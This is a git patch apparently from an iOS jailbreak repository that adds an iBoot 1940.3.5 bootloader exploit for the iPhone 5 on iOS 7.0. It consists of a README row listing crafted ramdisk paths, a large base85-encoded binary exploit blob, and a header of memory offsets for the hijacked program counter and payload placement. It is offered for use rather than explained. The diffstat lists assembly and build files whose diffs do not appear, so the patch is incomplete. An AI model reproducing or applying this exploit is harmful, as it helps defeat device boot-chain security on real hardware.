From cb3e8a2e2e4858d1f05534bf7a20dd2c2c9841a2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E3=81=AD=E3=82=80=E3=81=84?= <69592455+kok3shidoll@users.noreply.github.com> Date: Wed, 28 Jun 2023 22:22:53 +0900 Subject: [PATCH] iBoot-1940.3.5/iPhone5,2 --- exploit/README.md | 2 + exploit/iBoot-1940.3.5/iPhone5,1 | 1 + exploit/iBoot-1940.3.5/iPhone5,2/exploit | Bin 0 -> 524288 bytes .../iBoot-1940.3.5/iPhone5,2/src/asm/build.sh | 11 ++ .../iPhone5,2/src/asm/iboot_p1.s | 123 ++++++++++++++++++ .../iPhone5,2/src/asm/payload.s | 81 ++++++++++++ .../iPhone5,2/src/exploit_generic | Bin 0 -> 524288 bytes exploit/iBoot-1940.3.5/iPhone5,2/src/header.h | 26 ++++ 8 files changed, 244 insertions(+) create mode 120000 exploit/iBoot-1940.3.5/iPhone5,1 create mode 100644 exploit/iBoot-1940.3.5/iPhone5,2/exploit create mode 100755 exploit/iBoot-1940.3.5/iPhone5,2/src/asm/build.sh create mode 100644 exploit/iBoot-1940.3.5/iPhone5,2/src/asm/iboot_p1.s create mode 100644 exploit/iBoot-1940.3.5/iPhone5,2/src/asm/payload.s create mode 100644 exploit/iBoot-1940.3.5/iPhone5,2/src/exploit_generic create mode 100644 exploit/iBoot-1940.3.5/iPhone5,2/src/header.h diff --git a/exploit/README.md b/exploit/README.md index 4d89796..50f47bc 100644 --- a/exploit/README.md +++ b/exploit/README.md @@ -8,6 +8,8 @@ | iPhone 4s [iPhone4,1] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/q/r/disk.dmg` | | iPad 2 [iPad2,4] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/q/r/s/t/disk.dmg` | | iPod touch 5G [iPod5,1] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/disk.dmg` | +| iPhone 5 [iPhone5,1] | 7.0 - 7.0.6 | 1940.3.5 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/disk.dmg` | | iPhone 5 [iPhone5,1] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/q/r/s/t/u/v/w/disk.dmg` | +| iPhone 5 [iPhone5,2] | 7.0 - 7.0.6 | 1940.3.5 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/disk.dmg` | | iPhone 5 [iPhone5,2] | 7.1 - 7.1.2 | 1940.10.58 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/q/r/s/t/u/v/w/disk.dmg` | | iPad 4th [iPad3,5] | 7.0.4 | 1940.3.5 | `/a/b/c/d/e/f/g/h/i/j/k/l/m/disk.dmg` | diff --git a/exploit/iBoot-1940.3.5/iPhone5,1 b/exploit/iBoot-1940.3.5/iPhone5,1 new file mode 120000 index 0000000..3370556 --- /dev/null +++ b/exploit/iBoot-1940.3.5/iPhone5,1 @@ -0,0 +1 @@ +iPhone5,2 \ No newline at end of file diff --git a/exploit/iBoot-1940.3.5/iPhone5,2/exploit b/exploit/iBoot-1940.3.5/iPhone5,2/exploit new file mode 100644 index 0000000000000000000000000000000000000000..b01e0daa7b68f0e4930e1c1ee3daa33c4061ea93 GIT binary patch literal 524288 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 z1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;= zV1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~ z0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz z7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|Xg zfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_ z1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;= zV1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~ z0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz z7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|Xg zfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_ z1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;= zV1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~ z0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz z7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|Xg zfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_ z1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;= zV1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~0R|XgfB^;=V1NMz7+`<_1{h#~ z0R|XgfB^;=V1NMzE*AsIrhozpD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUg 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 z0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdb zFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?0 z00Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u< z3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs# zzyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d| z0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdb zFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?0 z00Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u< z3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs# zzyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d| z0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdb zFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?0 z00Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u< z3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs# zzyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d| z0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdb zFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?0 z00Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u< z3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs# zzyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d| z0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdb zFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?000Rs#zyJdbFu(u<3^2d|0}L?0 z00Rs#zyJdbY!w5^rhozpD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36A zpnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim} z0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7j zD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUg zfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7> z3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36A zpnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim} z0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7j zD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUg zfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7> z3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36A zpnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim} z0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0tzUgfC36Apnw7j zD4>7>3Mim}0tzUgfC36Apnw7jD4>7>3Mim}0$ZlQ>4#H4r79htJ~kac)Z)VNlZy)z zQ{}k5uJZ8%DfRMIzH6$^=8MZIP3EiE(~-DX+2Xz%*y6cj&x2DMS-Fneo80E|<6=)I e@*XcTuJ2--%#R(9$H&Fvt2g2cHU+j)fqw$``e#1? literal 0 HcmV?d00001 diff --git a/exploit/iBoot-1940.3.5/iPhone5,2/src/header.h b/exploit/iBoot-1940.3.5/iPhone5,2/src/header.h new file mode 100644 index 0000000..83de810 --- /dev/null +++ b/exploit/iBoot-1940.3.5/iPhone5,2/src/header.h @@ -0,0 +1,26 @@ +/* + * header.h + * Copyright (c) 2021 - 2023 @ kok3shidoll + * + * + */ + +/* iPhone5,2 - 11B554a [iBoot] */ +#define EXPLOIT_BASE 0x47bb0 // PC register obtained by exploit +#define EXPLOIT_SECOND_BASE 0x47BFC // Set second point to bypass overwriting by exploit +#define EXPLOIT_SWAP_BASE 0x478A0 // Exploit area is small, so set points somewhere else + +/* iPhone5,2 - 11B554a [NewiBoot] */ +#define PAYLOAD_BASE 0x43240 // main_task() configured for new iBoot +#define PAYLOAD_BASE_SIZE 0x44 // sz + +/* iPhone5,2 - 11B554a [ramdisk] */ +#define RDSK_PD_BASE 0x85c +#define RDSK_PD_SECOND_BASE 0x8a8 +#define RDSK_PD_SWAP_BASE 0x570 + +/* payload setting */ +#define EXPLOIT_BASE_SIZE 0x40 +#define EXPLOIT_SECOND_BASE_SIZE 0x34 +#define EXPLOIT_SWAP_BASE_SIZE 0x12 +